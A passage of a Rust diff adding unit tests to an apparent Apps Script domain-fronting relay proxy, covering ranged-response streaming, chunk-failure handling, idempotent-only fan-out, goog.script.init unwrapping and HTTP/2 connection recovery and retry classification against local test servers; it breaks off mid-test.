+        //   2. The caller-supplied `transform_head` closure applied
+        //      to that head (CORS injection in production).
+        //   3. Head, then probe body, then chunks in input order —
+        //      nothing reordered.
+        //
+        // Unit tests of the individual helpers cannot catch a
+        // mis-wired composition (assemble + transform + stream);
+        // this test drives all three stages in one call.
+        use futures_util::stream::{self, StreamExt as _};
+        let total: u64 = 12;
+        let first_slice = b"ABCD";
+        let probe_hdrs = vec![
+            (String::from("Content-Type"), String::from("application/octet-stream")),
+            (String::from("Content-Range"), String::from("bytes 0-3/12")),
+            (String::from("Content-Length"), String::from("4")),
+            (String::from("X-Origin-Hint"), String::from("abcd")),
+        ];
+        let tail_chunks = stream::iter(vec![
+            (4u64, 7u64, Ok::<Vec<u8>, &'static str>(b"EFGH".to_vec())),
+            (8u64, 11u64, Ok::<Vec<u8>, &'static str>(b"IJKL".to_vec())),
+        ]);
+        let tag_head = |head: &[u8]| -> Vec<u8> {
+            // Splice a marker header in front of the blank line that
+            // ends the head. Seeing it in the output proves the
+            // closure was handed the head rather than body bytes.
+            let without_terminator = head.strip_suffix(b"\r\n\r\n").unwrap_or(head);
+            let mut tagged = without_terminator.to_vec();
+            tagged.extend_from_slice(b"\r\nX-Transform: applied\r\n\r\n");
+            tagged
+        };
+        let mut wire: Vec<u8> = Vec::new();
+        stream_range_response_to(
+            &mut VecAsyncWriter(&mut wire),
+            &probe_hdrs,
+            first_slice,
+            total,
+            tail_chunks.map(|item| item),
+            &tag_head,
+            "https://example.test/big-file",
+        )
+        .await
+        .unwrap();
+
+        // Split what was written at the first blank line.
+        let head_end = wire.windows(4).position(|w| w == b"\r\n\r\n").expect("head terminator");
+        let (head, body) = wire.split_at(head_end + 4);
+        let head_text = std::str::from_utf8(head).unwrap();
+
+        // Stage 1: the head came out of assemble_200_head, built
+        // from the probe headers plus the full total.
+        assert!(head_text.starts_with("HTTP/1.1 200 OK\r\n"));
+        assert!(head_text.contains("Content-Length: 12\r\n"));
+        // The probe's own Content-Length (4) must not survive.
+        assert!(!head_text.contains("Content-Length: 4\r\n"));
+        // Content-Range described only the probe slice, so it has
+        // no place in the synthesised full response.
+        assert!(!head_text.contains("Content-Range:"));
+        // Every other probe header is forwarded untouched.
+        assert!(head_text.contains("Content-Type: application/octet-stream\r\n"));
+        assert!(head_text.contains("X-Origin-Hint: abcd\r\n"));
+
+        // Stage 2: the transform closure saw the assembled head.
+        assert!(head_text.contains("X-Transform: applied\r\n"));
+
+        // Stage 3: probe body first, then each chunk in the order
+        // it was supplied — no reordering, no interleaving.
+        assert_eq!(body, b"ABCDEFGHIJKL");
+    }
+
+    #[tokio::test]
+    async fn stream_range_response_to_propagates_mid_stream_chunk_failure() {
+        // Failure-path twin of the composition test: when a chunk
+        // in the middle of the stream is an Err, the call as a
+        // whole must return Err, yet everything committed before
+        // it (head + probe body + earlier good chunks) must already
+        // have been written, so a download client can resume via
+        // Range from where the body stopped.
+        use futures_util::stream::{self, StreamExt as _};
+        let first_slice = b"ABCD";
+        let probe_hdrs = vec![
+            (String::from("Content-Type"), String::from("application/octet-stream")),
+            (String::from("Content-Range"), String::from("bytes 0-3/12")),
+        ];
+        let tail_chunks = stream::iter(vec![
+            (4u64, 7u64, Ok::<Vec<u8>, &'static str>(b"EFGH".to_vec())),
+            (8u64, 11u64, Err::<Vec<u8>, &'static str>("chunk validation failure")),
+        ]);
+        let passthrough = |head: &[u8]| head.to_vec();
+        let mut wire: Vec<u8> = Vec::new();
+        let outcome = stream_range_response_to(
+            &mut VecAsyncWriter(&mut wire),
+            &probe_hdrs,
+            first_slice,
+            12,
+            tail_chunks.map(|item| item),
+            &passthrough,
+            "https://example.test/big-file",
+        )
+        .await;
+        assert!(outcome.is_err(), "mid-stream chunk failure must propagate as Err");
+
+        let head_end = wire.windows(4).position(|w| w == b"\r\n\r\n").expect("head terminator");
+        let body = &wire[head_end + 4..];
+        // Only the probe body and the one good chunk may appear.
+        // The failed chunk contributes nothing; the contract is
+        // "stop at the first error".
+        assert_eq!(body, b"ABCDEFGH");
+    }
+
+    #[tokio::test]
+    async fn stream_chunks_to_writer_aborts_on_chunk_validation_failure() {
+        // A chunk that fails mid-stream must surface as Err only
+        // *after* the head, the probe body, and every earlier good
+        // chunk have been written. Falling back to a single GET is
+        // off the table once bytes are on the wire; a short body
+        // plus Err is what lets the caller (TLS socket) expose a
+        // Content-Length mismatch, so the download client retries
+        // via Range from the point where the body stopped.
+        use futures_util::stream::{self, StreamExt as _};
+        let head = b"HTTP/1.1 200 OK\r\nContent-Length: 12\r\n\r\n";
+        let probe = b"AB";
+        let chunk_results = stream::iter(vec![
+            (2u64, 5u64, Ok::<Vec<u8>, &'static str>(b"CDEF".to_vec())),
+            (6u64, 9u64, Err::<Vec<u8>, &'static str>("Content-Range/body length mismatch")),
+            // Sentinel: this chunk sits behind the failure and must
+            // never reach the writer.
+            (10u64, 11u64, Ok::<Vec<u8>, &'static str>(b"KL".to_vec())),
+        ]);
+        let mut wire = Vec::new();
+        let outcome = stream_chunks_to_writer(
+            &mut VecAsyncWriter(&mut wire),
+            head,
+            probe,
+            12,
+            chunk_results.map(|item| item),
+            "https://example.test/file",
+        )
+        .await;
+        assert!(outcome.is_err(), "must return Err on first chunk failure");
+        // Exactly head + probe + the first (validated) chunk should
+        // have been committed — nothing at or past the failure.
+        let committed: Vec<u8> = [&head[..], &probe[..], &b"CDEF"[..]].concat();
+        assert_eq!(
+            wire, committed,
+            "post-failure chunks must not be written; partial body length tells client to retry"
+        );
+    }
+
+    #[test]
+    fn parse_relay_error_field() {
+        let body = r#"{"e":"unauthorized"}"#;
         let err = parse_relay_json(body.as_bytes()).unwrap_err();
         assert!(matches!(err, FronterError::Relay(_)));
     }
@@ -2476,6 +6314,9 @@ hello";
         assert!(!should_blacklist(200, ""));
         assert!(!should_blacklist(502, "bad gateway"));
         assert!(looks_like_quota_error("Exception: Service invoked too many times per day"));
+        assert!(looks_like_quota_error(
+            "Exception: Bandbreitenkontingent überschritten: https://example.com. Verringern Sie die Datenübertragungsrate."
+        ));
         assert!(!looks_like_quota_error("bad url"));
     }
 
@@ -2485,6 +6326,38 @@ hello";
         assert_eq!(mask_script_id("AKfycbx1234567890abcdef"), "AKfy...cdef");
     }
 
+    #[test]
+    fn parallel_relay_only_safe_for_idempotent_methods() {
+        // Regression guard for #743. Apps Script requests cannot be
+        // cancelled once started, so every attempt in a fan-out runs to
+        // completion server-side; fanning out a non-idempotent method
+        // would repeat its side effect (e.g. a comment posted twice).
+        for method in ["GET", "HEAD", "OPTIONS", "get", "head", "options"] {
+            let fanout_ok = is_method_safe_for_fanout(method);
+            assert!(
+                fanout_ok,
+                "{} should be safe for fan-out (idempotent per RFC 9110)", method
+            );
+        }
+        for method in ["POST", "PUT", "PATCH", "DELETE", "post", "put", "patch", "delete"] {
+            let fanout_ok = is_method_safe_for_fanout(method);
+            assert!(
+                !fanout_ok,
+                "{} must NOT be safe for fan-out (non-idempotent — duplicate side-effects)", method
+            );
+        }
+        // Anything unrecognised (CONNECT, TRACE, custom verbs, the
+        // empty string) falls on the NOT-safe side: the conservative
+        // default, in line with the upstream `UrlFetchApp` lookup.
+        for method in ["CONNECT", "TRACE", "PROPFIND", ""] {
+            let fanout_ok = is_method_safe_for_fanout(method);
+            assert!(
+                !fanout_ok,
+                "{} must default to NOT safe for fan-out when unrecognised", method
+            );
+        }
+    }
+
     #[test]
     fn parse_relay_array_set_cookie() {
         let body = r#"{"s":200,"h":{"Set-Cookie":["a=1","b=2"]},"b":""}"#;
@@ -2494,6 +6367,73 @@ hello";
         assert!(s.contains("Set-Cookie: b=2\r\n"));
     }
 
+    #[test]
+    fn decode_js_string_escapes_xnn_and_unicode() {
+        // \xNN escapes: \x7b = '{', \x22 = '"', \x7d = '}'
+        let inner = r#"\x7b\x22s\x22:200,\x22b\x22:\x22\x22\x7d"#;
+        let out = decode_js_string_escapes(inner).unwrap();
+        assert_eq!(out, r#"{"s":200,"b":""}"#);
+
+        // \uNNNN escape: \u0041 = 'A', followed by literal characters
+        assert_eq!(decode_js_string_escapes(r"\u0041BC").unwrap(), "ABC");
+
+        // standard single-character escapes (\n, \t, \\, \")
+        assert_eq!(decode_js_string_escapes(r#"a\nb\t\\\"c"#).unwrap(), "a\nb\t\\\"c");
+
+        // a truncated \x or \u escape yields None instead of panicking
+        assert!(decode_js_string_escapes(r"\x7").is_none());
+        assert!(decode_js_string_escapes(r"\u00").is_none());
+    }
+
+    /// Test fixture: wrap `inner_relay_json` in the
+    /// `goog.script.init("...", "", undefined)` page that Apps Script
+    /// HtmlService emits when a deployment answers through HtmlService.
+    /// Only a realistic subset of the escaping is reproduced: `{`/`}`
+    /// turn into `\x7b`/`\x7d`, `"` turns into `\"`, the rest is as-is.
+    fn build_goog_script_init_wrapper(inner_relay_json: &str) -> String {
+        // First layer: the JSON envelope {"userHtml": "<inner>"}. serde
+        // does the JSON string escaping of the inner document for us
+        // (each `"` in it comes out as `\"`).
+        let envelope = serde_json::json!({ "userHtml": inner_relay_json });
+        let envelope_text = serde_json::to_string(&envelope).unwrap();
+        // Second layer: escape the envelope for embedding in the JS
+        // string literal passed to `goog.script.init("…")`: braces go
+        // to `\xNN`, double quotes to `\"`, anything else is copied.
+        let mut js_literal = String::with_capacity(envelope_text.len() * 2);
+        envelope_text.chars().for_each(|ch| match ch {
+            '{' => js_literal.push_str(r"\x7b"),
+            '}' => js_literal.push_str(r"\x7d"),
+            '"' => js_literal.push_str(r#"\""#),
+            other => js_literal.push(other),
+        });
+        // Finally, embed the literal in a minimal HTML page around
+        // the `goog.script.init` call.
+        format!(
+            "<html><body><script>goog.script.init(\"{}\", \"\", undefined);</script></body></html>",
+            js_literal
+        )
+    }
+
+    #[test]
+    fn extract_apps_script_user_html_unwraps_goog_init() {
+        // Round trip: wrap a relay JSON document, then unwrap it again.
+        let relay_json = r#"{"s":200,"h":{},"b":"aGk="}"#;
+        let page = build_goog_script_init_wrapper(relay_json);
+        assert_eq!(extract_apps_script_user_html(&page).unwrap(), relay_json);
+    }
+
+    #[test]
+    fn parse_relay_json_unwraps_goog_script_init() {
+        // Full path: a body wrapped in the goog.script.init iframe page
+        // must still go through parse_relay_json. Before the unwrap
+        // helper existed this failed: `key must be a string at line 2`.
+        let relay_json = r#"{"s":200,"h":{},"b":""}"#;
+        let page = build_goog_script_init_wrapper(relay_json);
+        let response = parse_relay_json(page.as_bytes()).unwrap();
+        let response_text = String::from_utf8_lossy(&response);
+        assert!(response_text.starts_with("HTTP/1.1 200 "), "got: {}", response_text);
+    }
+
     #[tokio::test(flavor = "current_thread")]
     async fn chunked_reader_consumes_final_crlf_and_trailers() {
         let (mut client, mut server) = duplex(1024);
@@ -2571,4 +6511,710 @@ hello";
             other => panic!("unexpected error: {}", other),
         }
     }
+
+    // ─── h2 transport ──────────────────────────────────────────────────
+
+    /// Response-phase deadline handed to the transport tests below.
+    /// Ten seconds is far more than a localhost h2c hop should ever
+    /// need, so a slow or flaky run can't be mistaken for a genuine
+    /// timeout firing. Tests that *want* to observe a timeout pick a
+    /// small value explicitly.
+    const TEST_RESPONSE_DEADLINE: Duration = Duration::from_secs(10);
+
+    /// Construct a small but valid `DomainFronter` for unit tests from
+    /// an inline JSON config; only `force_http1` varies. A placeholder
+    /// `google_ip` and `verify_ssl=true` are harmless here because
+    /// `DomainFronter::new` doesn't touch the network.
+    fn fronter_for_test(force_http1: bool) -> DomainFronter {
+        let config_json = format!(
+            r#"{{
+                "mode": "apps_script",
+                "google_ip": "127.0.0.1",
+                "front_domain": "www.google.com",
+                "script_id": "TEST",
+                "auth_key": "test_auth_key",
+                "listen_host": "127.0.0.1",
+                "listen_port": 8085,
+                "log_level": "info",
+                "verify_ssl": true,
+                "force_http1": {}
+            }}"#,
+            force_http1
+        );
+        let config: Config = serde_json::from_str(&config_json).unwrap();
+        DomainFronter::new(&config).expect("test fronter must construct")
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn force_http1_disables_h2_at_construction() {
+        // force_http1=true is the kill switch: the fronter has to come
+        // out of the constructor already flagged h2-disabled, so that
+        // ensure_h2 bails out instead of attempting ALPN.
+        let http1_only = fronter_for_test(true);
+        let flagged = http1_only.h2_disabled.load(Ordering::Relaxed);
+        assert!(flagged, "force_http1=true must set h2_disabled at construction");
+
+        let h2_handle = http1_only.ensure_h2().await;
+        assert!(
+            h2_handle.is_none(),
+            "ensure_h2 must return None when h2 is disabled"
+        );
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn force_http1_false_leaves_h2_enabled() {
+        // With force_http1=false the constructor must leave the
+        // h2-disabled flag unset.
+        let fronter = fronter_for_test(false);
+        let h2_disabled = fronter.h2_disabled.load(Ordering::Relaxed);
+        assert!(!h2_disabled, "default must leave h2 enabled");
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn poison_h2_if_gen_is_noop_when_cell_is_empty() {
+        // Poison runs on every per-request error, so it can easily
+        // find the cell already emptied by a concurrent poison. That
+        // case must neither panic nor wedge; the cell just stays None.
+        let fronter = fronter_for_test(false);
+        fronter.poison_h2_if_gen(0).await;
+        let slot = fronter.h2_cell.lock().await;
+        assert!(slot.is_none());
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn poison_h2_if_gen_only_clears_matching_generation() {
+        // Guards against a recovery race: task A still holds the gen=1
+        // SendRequest when that connection dies; task B reopens, so the
+        // cell is now a healthy gen=2. A's late poison(1) must leave
+        // gen=2 alone. The earlier code cleared the cell regardless of
+        // generation, which caused connection churn during recovery.
+        let always_ok = |_req: http::Request<h2::RecvStream>| {
+            let resp = http::Response::builder().status(200).body(()).unwrap();
+            (resp, Vec::new())
+        };
+        let (addr, server_handle) = spawn_h2c_server(always_ok).await;
+        let gen2_send = h2c_client(addr).await;
+
+        let fronter = fronter_for_test(false);
+        // Plant a gen=2 cell, as if task B had just reopened.
+        {
+            let mut slot = fronter.h2_cell.lock().await;
+            *slot = Some(H2Cell {
+                send: gen2_send.clone(),
+                created: Instant::now(),
+                generation: 2,
+                dead: Arc::new(AtomicBool::new(false)),
+            });
+        }
+        // Task A arrives late with its stale generation.
+        fronter.poison_h2_if_gen(1).await;
+        // The gen=2 cell has to still be there.
+        let slot = fronter.h2_cell.lock().await;
+        assert!(
+            slot.is_some(),
+            "poison_h2_if_gen(1) must not clear gen=2 cell"
+        );
+        assert_eq!(slot.as_ref().unwrap().generation, 2);
+        drop(slot);
+
+        // Whereas the matching generation does clear it.
+        fronter.poison_h2_if_gen(2).await;
+        let slot = fronter.h2_cell.lock().await;
+        assert!(slot.is_none(), "poison_h2_if_gen(2) must clear gen=2 cell");
+
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn ensure_h2_rejects_dead_cell_within_ttl() {
+        // Scenario: the cell is younger than H2_CONN_TTL_SECS, but the
+        // connection driver has already set `dead` (for instance after
+        // an upstream GOAWAY). If `ensure_h2` ignored the flag it
+        // would hand out the stale SendRequest, and the next request
+        // would burn an h2 round trip just to find the breakage.
+        // Honouring the flag means the dead cell is not served and
+        // gets replaced via the open-lock path instead.
+        let always_ok = |_req: http::Request<h2::RecvStream>| {
+            let resp = http::Response::builder().status(200).body(()).unwrap();
+            (resp, Vec::new())
+        };
+        let (addr, server_handle) = spawn_h2c_server(always_ok).await;
+        let stale_send = h2c_client(addr).await;
+
+        let fronter = fronter_for_test(false);
+        let driver_exited = Arc::new(AtomicBool::new(true)); // as if the driver had exited
+        {
+            let mut slot = fronter.h2_cell.lock().await;
+            *slot = Some(H2Cell {
+                send: stale_send,
+                created: Instant::now(), // comfortably inside the TTL
+                generation: 1,
+                dead: Arc::clone(&driver_exited),
+            });
+        }
+
+        // Ordinarily the fast path answers Some(send, gen) for a cell
+        // inside its TTL. With dead=true the stale SendRequest must
+        // NOT come back. The failure-backoff timestamp is set up
+        // front so that ensure_h2 stops at the backoff check and does
+        // no network I/O, whatever happens to be listening on
+        // 127.0.0.1:443 of the dev/CI host. That keeps the assertion
+        // focused on the dead-flag check alone.
+        *fronter.h2_open_failed_at.lock().await = Some(Instant::now());
+
+        let handed_out = fronter.ensure_h2().await;
+        assert!(
+            handed_out.is_none(),
+            "ensure_h2 must not serve a cell whose driver flipped `dead`"
+        );
+
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn ensure_h2_skips_reopen_during_failure_backoff() {
+        // While an open failure is recent (within
+        // H2_OPEN_FAILURE_BACKOFF_SECS), ensure_h2 must answer None
+        // without starting a new handshake — otherwise every concurrent
+        // caller pays the full handshake-timeout cost during an outage.
+        let fronter = fronter_for_test(false);
+        // Simulate an open failure that happened just now.
+        *fronter.h2_open_failed_at.lock().await = Some(Instant::now());
+
+        // Expect an immediate None with no call into open_h2. A real
+        // open attempt would TCP-connect to 127.0.0.1:443, which would
+        // either fail slowly or succeed against an unrelated service;
+        // in both cases the call would take observably longer than
+        // the 100 ms bound asserted below.
+        let t0 = Instant::now();
+        let result = fronter.ensure_h2().await;
+        assert!(result.is_none(), "must return None during backoff");
+        assert!(
+            t0.elapsed() < Duration::from_millis(100),
+            "must return immediately without open attempt; took {:?}",
+            t0.elapsed()
+        );
+    }
+
+    /// Start a bare-bones h2c server (cleartext HTTP/2, no TLS) bound
+    /// to an ephemeral port on 127.0.0.1. Each incoming request is
+    /// passed to `handler`, which returns the response head and body
+    /// bytes to send back. The bound address and the task's
+    /// JoinHandle are returned so the test can `abort()` the server.
+    async fn spawn_h2c_server<F>(
+        handler: F,
+    ) -> (std::net::SocketAddr, tokio::task::JoinHandle<()>)
+    where
+        F: Fn(http::Request<h2::RecvStream>) -> (http::Response<()>, Vec<u8>)
+            + Send
+            + Sync
+            + 'static,
+    {
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let bound_addr = listener.local_addr().unwrap();
+        let handler = Arc::new(handler);
+        let server_task = tokio::spawn(async move {
+            // One connection is all these tests ever need.
+            let (sock, _) = listener.accept().await.unwrap();
+            let mut conn = h2::server::handshake(sock).await.unwrap();
+            // Serve streams until the peer is done (None) or the
+            // connection reports an error.
+            while let Some(Ok((req, mut respond))) = conn.accept().await {
+                let (resp, payload) = handler(req);
+                // An empty payload means the response head also
+                // closes the stream.
+                let head_only = payload.is_empty();
+                let mut stream = respond
+                    .send_response(resp, head_only)
+                    .expect("send_response in test");
+                if !head_only {
+                    stream.send_data(Bytes::from(payload), true)
+                        .expect("send_data in test");
+                }
+            }
+        });
+        (bound_addr, server_task)
+    }
+
+    /// Echo flavour of the h2c test server: for every request it
+    /// drains the request body and sends those bytes back as the body
+    /// of a 200 response, so a test can check what the client sent.
+    async fn spawn_h2c_echo_server() -> (std::net::SocketAddr, tokio::task::JoinHandle<()>) {
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let bound_addr = listener.local_addr().unwrap();
+        let server_task = tokio::spawn(async move {
+            let (sock, _) = listener.accept().await.unwrap();
+            let mut conn = h2::server::handshake(sock).await.unwrap();
+            // One connection only; stop serving on the first accept
+            // error or once the peer has no more streams.
+            while let Some(Ok((req, mut respond))) = conn.accept().await {
+                let mut req_body = req.into_body();
+                let mut echoed = Vec::new();
+                // Collect DATA frames until end of stream; a body
+                // error just ends collection with what we have so far.
+                while let Some(Ok(frame)) = req_body.data().await {
+                    let frame_len = frame.len();
+                    echoed.extend_from_slice(&frame);
+                    // Hand the consumed bytes back to h2 flow control
+                    // so the sender's window reopens.
+                    let _ = req_body.flow_control().release_capacity(frame_len);
+                }
+                // Reply 200 and stream the collected bytes back,
+                // closing the stream with the data frame.
+                let ok = http::Response::builder().status(200).body(()).unwrap();
+                let mut stream = respond.send_response(ok, false).unwrap();
+                stream.send_data(Bytes::from(echoed), true).unwrap();
+            }
+        });
+        (bound_addr, server_task)
+    }
+
+    /// Connect to `addr` over plain TCP, perform the h2 client
+    /// handshake, and return the resulting `SendRequest<Bytes>`. The
+    /// connection driver is moved onto a background task.
+    async fn h2c_client(addr: std::net::SocketAddr) -> h2::client::SendRequest<Bytes> {
+        let tcp = TcpStream::connect(addr).await.unwrap();
+        let (send_request, driver) = h2::client::handshake(tcp).await.unwrap();
+        tokio::spawn(async move {
+            let _ = driver.await;
+        });
+        send_request
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn h2_round_trip_actually_transmits_post_body() {
+        // The server drains the request body and echoes it back.
+        // Comparing the echo with what we passed in shows the
+        // send_data path delivered the bytes, beyond a bare 200.
+        let (addr, server_handle) = spawn_h2c_echo_server().await;
+
+        let payload = b"the-actual-payload-sent-by-h2_round_trip";
+        let fronter = fronter_for_test(false);
+        let send = h2c_client(addr).await;
+        let (status, _hdrs, echoed) = fronter
+            .h2_round_trip(
+                send,
+                "POST",
+                "/echo",
+                "127.0.0.1",
+                Bytes::from_static(payload),
+                Some("application/json"),
+                TEST_RESPONSE_DEADLINE,
+            )
+            .await
+            .expect("h2 round trip should succeed");
+        assert_eq!(status, 200);
+        assert_eq!(
+            echoed, payload,
+            "server must have received the exact bytes we sent"
+        );
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn h2_round_trip_decodes_gzip_responses() {
+        // Parity with the h1 read_http_response path: a response
+        // marked `content-encoding: gzip` has to be inflated before
+        // it is returned, so JSON parsing downstream gets plain
+        // bytes no matter which transport carried the response.
+        use flate2::write::GzEncoder;
+        use flate2::Compression;
+        use std::io::Write;
+
+        let plain = b"{\"hello\":\"world\"}";
+        let mut encoder = GzEncoder::new(Vec::new(), Compression::default());
+        encoder.write_all(plain).unwrap();
+        let compressed = encoder.finish().unwrap();
+
+        // The handler owns the compressed bytes and serves a copy
+        // of them for each request it answers.
+        let (addr, server_handle) = spawn_h2c_server(move |_req| {
+            let resp = http::Response::builder()
+                .status(200)
+                .header("content-encoding", "gzip")
+                .body(())
+                .unwrap();
+            (resp, compressed.clone())
+        })
+        .await;
+
+        let fronter = fronter_for_test(false);
+        let send = h2c_client(addr).await;
+        let (status, _hdrs, body) = fronter
+            .h2_round_trip(send, "GET", "/", "127.0.0.1", Bytes::new(), None, TEST_RESPONSE_DEADLINE)
+            .await
+            .unwrap();
+        assert_eq!(status, 200);
+        assert_eq!(body, plain, "gzip body must be decoded transparently");
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn run_h2_relay_with_send_follows_redirect_chain() {
+        // Drives run_h2_relay_with_send, the testable core of
+        // h2_relay_request, so the real redirect loop (timeout,
+        // RequestSent classification and per-hop poison-by-gen
+        // included) is what gets tested here, rather than a
+        // hand-written copy of it.
+        // Owned by the handler: hop 0 redirects, later hops check the path.
+        let hops_seen = std::sync::atomic::AtomicUsize::new(0);
+        let (addr, server_handle) = spawn_h2c_server(move |req| {
+            let hop = hops_seen.fetch_add(1, Ordering::Relaxed);
+            if hop > 0 {
+                assert_eq!(req.uri().path(), "/next", "second hop must follow Location");
+                let resp = http::Response::builder().status(200).body(()).unwrap();
+                (resp, b"final".to_vec())
+            } else {
+                let resp = http::Response::builder()
+                    .status(302)
+                    .header("location", "/next")
+                    .body(())
+                    .unwrap();
+                (resp, Vec::new())
+            }
+        })
+        .await;
+
+        let fronter = fronter_for_test(false);
+        let send = h2c_client(addr).await;
+
+        let (status, _hdrs, body) = fronter
+            .run_h2_relay_with_send(
+                send,
+                /* generation */ 1,
+                "/start",
+                Bytes::new(),
+                TEST_RESPONSE_DEADLINE,
+            )
+            .await
+            .expect("h2 relay should follow redirect to 200");
+        assert_eq!(status, 200);
+        assert_eq!(body, b"final");
+        // One successful relay call: h2_calls is 1, no fallback counted.
+        assert_eq!(fronter.h2_calls.load(Ordering::Relaxed), 1);
+        assert_eq!(fronter.h2_fallbacks.load(Ordering::Relaxed), 0);
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn run_h2_relay_with_send_reports_request_sent_no_on_dead_connection() {
+        // Build an h2c client whose connection has been severed by the
+        // time run_h2_relay_with_send runs. The first `send.ready().await`
+        // inside h2_round_trip should then fail, and RequestSent::No is
+        // the right classification: no stream was opened on the wire.
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let server_task = tokio::spawn(async move {
+            // Accept one connection and complete the h2 handshake; the
+            // connection is dropped when this task's body ends.
+            let (sock, _) = listener.accept().await.unwrap();
+            let _connection = h2::server::handshake(sock).await.unwrap();
+            // Stay alive briefly so the client can finish its handshake.
+            tokio::time::sleep(Duration::from_millis(50)).await;
+        });
+
+        let send = h2c_client(addr).await;
+        // Wait for the server to drop; the sleep after it presumably lets the client notice.
+        server_task.await.unwrap();
+        tokio::time::sleep(Duration::from_millis(50)).await;
+
+        let fronter = fronter_for_test(false);
+        let result = fronter
+            .run_h2_relay_with_send(
+                send,
+                1,
+                "/x",
+                Bytes::from_static(b"some-body"),
+                TEST_RESPONSE_DEADLINE,
+            )
+            .await;
+        match result {
+            Err((_, RequestSent::No)) => {} // the expected classification
+            Err((e, RequestSent::Maybe)) => {
+                panic!("dead-conn failure classified as Maybe (unsafe to retry): {}", e)
+            }
+            Ok(_) => panic!("expected error against dropped server"),
+        }
+        // The failure counts as one h2 fallback and zero h2 calls.
+        assert_eq!(fronter.h2_fallbacks.load(Ordering::Relaxed), 1);
+        assert_eq!(fronter.h2_calls.load(Ordering::Relaxed), 0);
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn run_h2_relay_with_send_reports_request_sent_maybe_on_post_send_reset() {
+        // Server accepts headers (so the request reaches it) and then
+        // resets the stream. The client sees a stream error AFTER
+        // send_request returned Ok. RequestSent::Maybe is the only
+        // safe classification — Apps Script may have started executing.
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let server_task = tokio::spawn(async move {
+            let (sock, _) = listener.accept().await.unwrap();
+            let mut connection = h2::server::handshake(sock).await.unwrap();
+            if let Some(Ok((_req, mut respond))) = connection.accept().await {
+                // Reset the stream after receiving headers — simulates
+                // the server starting to process and then bailing
+                // (matches the "Apps Script started UrlFetchApp then
+                // failed" scenario).
+                respond.send_reset(h2::Reason::INTERNAL_ERROR);
+            }
+            // Keep the connection alive briefly so the client sees the
+            // RST_STREAM rather than a connection-level close.
+            tokio::time::sleep(Duration::from_millis(100)).await;
+        });
+
+        let send = h2c_client(addr).await;
+        let fronter = fronter_for_test(false);
+        let result = fronter
+            .run_h2_relay_with_send(
+                send,
+                1,
+                "/x",
+                Bytes::from_static(b"body"),
+                TEST_RESPONSE_DEADLINE,
+            )
+            .await;
+        match result {
+            Err((_, RequestSent::Maybe)) => {} // expected
+            Err((e, RequestSent::No)) => panic!(
+                "post-send RST classified as No — would let caller \
+                 unsafely replay non-idempotent request: {}",
+                e
+            ),
+            Ok(_) => panic!("expected error against RST_STREAM"),
+        }
+
+        server_task.await.unwrap();
+    }
+
+    // ─── NonRetryable wrapper + retry/fallback policy ────────────────────
+
+    #[test]
+    fn nonretryable_wrapper_is_not_retryable_other_variants_are() {
+        // Surfaces the contract that do_relay_with_retry and the
+        // exit-node fallback rely on. If this ever flips, those
+        // sites would silently start re-issuing post-send failures.
+        let plain = FronterError::Relay("transient".into());
+        assert!(plain.is_retryable(), "plain Relay error must be retryable");
+
+        let plain2 = FronterError::Timeout;
+        assert!(plain2.is_retryable(), "Timeout must be retryable");
+
+        let wrapped = FronterError::NonRetryable(Box::new(FronterError::Relay("post-send".into())));
+        assert!(!wrapped.is_retryable(), "NonRetryable must not be retryable");
+
+        // Display must be transparent so log lines look identical.
+        let inner_msg = "h2 response: stream RST".to_string();
+        let inner = FronterError::Relay(inner_msg.clone());
+        let wrapped = FronterError::NonRetryable(Box::new(inner));
+        let displayed = wrapped.to_string();
+        assert!(
+            displayed.contains(&inner_msg),
+            "transparent Display should surface inner: got {}",
+            displayed
+        );
+
+        // into_inner unwraps once.
+        let inner_again = wrapped.into_inner();
+        assert!(matches!(inner_again, FronterError::Relay(_)));
+        assert!(inner_again.is_retryable(), "unwrapped error is retryable");
+    }
+
+    // Note on test coverage gap: we don't have a deterministic test
+    // that the ready/back-pressure phase's timeout reports
+    // `RequestSent::No`. h2 client enforces remote
+    // `MAX_CONCURRENT_STREAMS` at `send_request` time rather than at
+    // `ready` time, so a "saturate the slots, expect ready to block"
+    // setup actually races down the response-phase path instead.
+    // The ready-arm code in `h2_round_trip` is small (single match
+    // arm with `RequestSent::No` literally written next to the
+    // timeout error) and covered by review. Other safety properties
+    // (post-send Maybe via stream RST, pre-send No via dead conn,
+    // NonRetryable wrap propagation) are covered by the tests above
+    // and below.
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn run_h2_relay_with_send_does_not_wrap_pre_send_in_nonretryable() {
+        // Regression guard: the NonRetryable wrap is the *call site's*
+        // job (do_relay_once_with applies it for unsafe methods only).
+        // run_h2_relay_with_send returns the raw RequestSent::No so
+        // the call site can decide. If h2_relay_request started
+        // wrapping unconditionally, even safe-method requests would
+        // become non-retryable on transient pre-send failures.
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let server_task = tokio::spawn(async move {
+            let (sock, _) = listener.accept().await.unwrap();
+            let _connection = h2::server::handshake(sock).await.unwrap();
+            tokio::time::sleep(Duration::from_millis(50)).await;
+        });
+        let send = h2c_client(addr).await;
+        server_task.await.unwrap();
+        tokio::time::sleep(Duration::from_millis(50)).await;
+
+        let fronter = fronter_for_test(false);
+        let result = fronter
+            .run_h2_relay_with_send(
+                send,
+                1,
+                "/x",
+                Bytes::from_static(b"x"),
+                TEST_RESPONSE_DEADLINE,
+            )
